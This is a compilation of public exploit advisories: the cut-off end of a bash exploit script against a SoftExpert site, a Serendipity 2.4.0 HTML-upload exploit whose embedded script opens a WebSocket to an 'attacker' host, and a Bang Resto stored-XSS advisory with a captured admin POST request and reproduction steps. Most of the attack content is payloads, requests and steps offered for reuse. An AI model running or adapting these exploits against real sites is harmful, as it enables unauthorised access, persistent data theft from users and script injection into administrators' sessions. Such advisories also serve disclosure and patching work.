-b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \
"https://$target/softexpert/selogout"
}
echo -e "${blue}\nLogging out${end}"
logout >/dev/null
echo -e "\n\nDone!"
## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE
## Author: nu11secur1ty
## Date: 04.26.2023
## Vendor: https://docs.s9y.org/index.html
## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
## Description:
The already authenticated attacker can upload HTML files on the
server, which is absolutely dangerous and STUPID
In this file, the attacker can be codding a malicious web-socket
responder that can connect with some nasty webserver somewhere. It
depends on the scenario, the attacker can steal every day very
sensitive information, for a very long period of time, until the other
users will know that something is not ok with this system, and they
decide to stop using her, but maybe they will be too late for this
decision.
STATUS: HIGH Vulnerability
[+]Exploit:
```HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>NodeJS WebSocket Server</title>
</head>
<body>
<h1>You have just sent a message to your attacker,<br>
<h1>that you are already connected to him.</h1>
<script>
const ws = new WebSocket("ws://attacker:8080");
ws.addEventListener("open", () =>{
console.log("We are connected to you");
ws.send("How are you, dear :)?");
});
ws.addEventListener('message', function (event) {
console.log(event.data);
});
</script>
</body>
</html>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0)
## Proof and Exploit:
[href](https://streamable.com/2s80z6)
## Time spend:
01:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage:
https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link:
https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29848
*Steps to Reproduce:*
1. First login to your admin panel.
2. then go to Menu section and click add new menu from group.
your request data will be:
POST /bangresto/admin/menu.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/111.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/admin/menu.php
Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6
Connection: close
itemName=test&itemPrice=1&menuID=1&addItem=
3. Then use any XSS Payload in "itemName" parameter and click add.
4. You will see XSS pop up.